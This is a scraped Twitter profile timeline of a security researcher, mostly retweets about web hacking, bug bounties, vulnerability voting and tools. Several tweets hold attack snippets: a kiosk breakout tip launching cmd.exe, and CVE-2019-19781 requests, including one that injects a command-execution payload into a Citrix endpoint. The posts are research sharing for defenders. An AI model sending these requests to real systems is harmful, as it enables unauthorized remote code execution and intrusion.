Ricardo Iramar

@ricardo_iramar

Every time count is regressive.

Brazil/Sao Paulo
Vrijeme pridruživanja: ožujak 2009.

Tweetovi

Blokirali ste korisnika/cu @ricardo_iramar

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ricardo_iramar

  1. Prikvačeni tweet
    7. pro 2019.

    This is a story how I accidentally found a common vulnerability across similar web applications just by reusing cookies on different subdomains from the same web application.

    Poništi
  2. 1. velj
    Poništi
  3. proslijedio/la je Tweet
    31. sij

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

    Poništi
  4. proslijedio/la je Tweet
    29. sij

    Findomain 1.2.0 is out! The last benchmark resulted in Findomain being able to resolve 33668 subdomains for google[.]com in 580 seconds (3480 subdomains resolved per minute) using --threads 100.

    Poništi
  5. proslijedio/la je Tweet

    wow i just learned a thing about metasploit by accident that I wish I could go back and teach myself like ten years ago. i could have saved myself a collective year of typing and tab completion.

    Poništi
  6. proslijedio/la je Tweet
    27. sij

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

    Poništi
  7. proslijedio/la je Tweet
    24. sij

    This weekend is your last chance to vote for the Top 10 (new) Web Hacking Techniques of 2019! Voting closes Monday.

    Poništi
  8. 21. sij

    Amazing resource to automate an attack where AWS signed requests (including using temp credentials) are required. Saved my day! :)

    Poništi
  9. proslijedio/la je Tweet
    20. sij

    "Don't worry about this tech debt, we'll clean it up next sprint." Senior developer:

    This little maneuver is gonna cost us 51 years
    Poništi
  10. proslijedio/la je Tweet
    15. sij

    😱 Apparently has lost access to his account and there's an important document we need to retrieve from this site. Can you retrieve the document before he does? An all-expense ticket for could await.

    Poništi
  11. 14. sij
    Poništi
  12. proslijedio/la je Tweet
    14. sij

    Voting is now open for the top 10 new web hacking techniques of 2019:

    Poništi
  13. proslijedio/la je Tweet
    14. sij

    We need your help to select the top 10 web hacking techniques of 2019! Cast your vote here:

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  15. proslijedio/la je Tweet
    13. sij
    Poništi
  16. proslijedio/la je Tweet

    I just disclosed a Critical SQL injection on a Starbucks enterprise database that exposed almost 1 million financial and accounting records - taxes, receipts, payroll. The Starbucks team was incredibly quick to respond, fixing it within 2 days.

    Poništi
  17. proslijedio/la je Tweet
    12. sij

    Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :)

    Poništi
  18. proslijedio/la je Tweet
    12. sij

    I guess this is a feature! Authenticated file read the original requests are intended to read JSON files however you can read others file.

    Poništi
  19. 11. sij
    Poništi
  20. proslijedio/la je Tweet
    7. sij

    CVE-2019-19781 start with a path traversal on the "vpns" folder: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf Patched if => HTTP/1.1 403 Forbidden

    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    9. sij

    The interesting part is how to convert a limited file writing into RCE :P

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·